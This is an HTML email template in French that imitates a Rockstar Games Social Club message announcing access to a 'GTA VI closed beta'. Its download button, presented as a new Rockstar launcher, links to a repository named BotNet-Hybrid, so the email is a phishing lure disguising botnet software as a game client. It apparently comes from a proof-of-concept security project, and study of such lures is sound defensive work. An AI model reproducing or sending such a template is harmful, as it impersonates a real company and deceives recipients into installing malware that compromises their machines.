<html>
  <body
    leftmargin="0"
    marginwidth="0"
    topmargin="0"
    marginheight="0"
    offset="0"
    bgcolor="#000000"
  >
    <style>
      a,
      a:link,
      a:visited,
      a:hover,
      a:active {
        color: #fcb131;
      }
    </style>
    <table width="100%" cellpadding="0" cellspacing="0" bgcolor="#000000">
      <tr>
        <td
          valign="top"
          align="center"
          background="http://media.rockstargames.com/sc/images/emailtemplate/background.gif"
        >
          <table width="600" cellpadding="0" cellspacing="0" border="0">
            <tr>
              <td colspan="2" height="50">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="50"
                  border="0"
                />
              </td>
            </tr>
            <tr>
              <td width="300">
                <a
                  href="http://socialclub.rockstargames.com?utm_source=Social%20Club&utm_medium=Email&utm_campaign=Administrative%20Emails&utm_content=fr"
                >
                  <img
                    src="http://media.rockstargames.com/sc/images/emailtemplate/rgsc_logo.gif"
                    border="0"
                    alt="Rockstar Games Social Club"
                    width="300"
                    height="122"
                  />
                </a>
              </td>
              <td width="300" valign="top" align="right">
                <font size="1" color="#5c5c5c" face="arial">
                </font>
              </td>
            </tr>
            <tr>
              <td colspan="2" bgcolor="#FFFFFF" height="8">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="8"
                  border="0"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" height="20">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="20"
                  border="0"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" align="left">
                <font color="#FFFFFF" face="arial" size="6">
                  <div style="text-align: center">
                    <span
                      style="
                        font-size: 43px;
                        color: #ffffff;
                        font-family: arial;
                        font-weight: bold;
                      "
                    >
                      GTA VI bêta !
                    </span>
                  </div>
                </font>
              </td>
            </tr>
            <tr>
              <td colspan="2" height="20">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  border="0"
                  height="20"
                  width="1"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" align="left">
                <font color="#FFFFFF" face="arial" size="4">
                  <b>
                    <span
                      style="
                        font-size: 20px;
                        color: #ffffff;
                        font-family: arial;
                        font-weight: bold;
                      "
                    >
                      Félicitations !
                    <br>
                    <br>
                      Vous avez désormais accès à la bêta fermée de GTA VI !
                    <br>
                    <br>
                      Pour cela, télécharger le nouveau launcher Rockstar Games ci-dessous et connectez-vous avec votre compte Social Club.
                    </span>
                  </b>
                </font>
                <p>
                  <font color="#FFFFFF" face="arial" size="4">
                    Veuillez
                    <a href="https://pastebin.fr/129220">
                      <font color="#FDB31E"> signaler tout problème</font>
                    </a>
                    qui adviendrait lors du lancement à notre équipe de
                    développeurs.</font
                  >
                </p>
              </td>
            </tr>
            <tr>
              <td colspan="2" height="20">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  border="0"
                  height="20"
                  width="1"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" align="center">
                <font color="#000000" face="arial" size="5">
                  <a
                    href="https://github.com/PoCInnovation/BotNet-Hybrid.git"
                    style="
                      font-size: 35px;
                      font-family: arial;
                      font-weight: bold;
                      color: #000000;
                      text-decoration: none;
                      background-color: #fcb131;
                      padding: 0.1em 0.5em 0.1em 0.5em;
                    "
                  >
                    Télecharger
                  </a>
                </font>
              </td>
            </tr>
            <tr>
              <td colspan="2" height="20">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  border="0"
                  height="20"
                  width="1"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" bgcolor="#FFFFFF" height="3">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="3"
                  border="0"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" height="25">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="25"
                  border="0"
                />
              </td>
            </tr>
            <tr>
              <td width="300" valign="top" align="left">
                <font size="1" color="#5c5c5c" face="arial">
                  <span
                    style="font-size: 9px; color: #5c5c5c; font-family: arial"
                  >
                    Cet e-mail administratif vous est envoyé depuis Rockstar
                    Games, 622 Broadway, NY, NY 10012. Si vous souhaitez
                    recevoir toutes les dernières informations concernant les
                    annonces Rockstar, les sorties officielles, les concours,
                    les événements spéciaux et plus,
                    <a
                      href="https://socialclub.rockstargames.com/settings/email?utm_source=Social%20Club&utm_medium=Email&utm_campaign=Administrative%20Emails&utm_content=fr"
                    >
                      inscrivez-vous à la liste de diffusion Rockstar Games</a
                    >
                    .</span
                  >
                </font>
              </td>
              <td width="300" align="right" valign="top">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/rg_logo.gif"
                  border="0"
                  alt="Rockstar Games"
                  width="60"
                  height="56"
                />
              </td>
            </tr>
            <tr>
              <td colspan="2" height="50">
                <img
                  src="http://media.rockstargames.com/sc/images/emailtemplate/blank.gif"
                  alt=""
                  width="1"
                  height="50"
                  border="0"
                />
              </td>
            </tr>
          </table>
        </td>
      </tr>
    </table>
  </body>
</html>
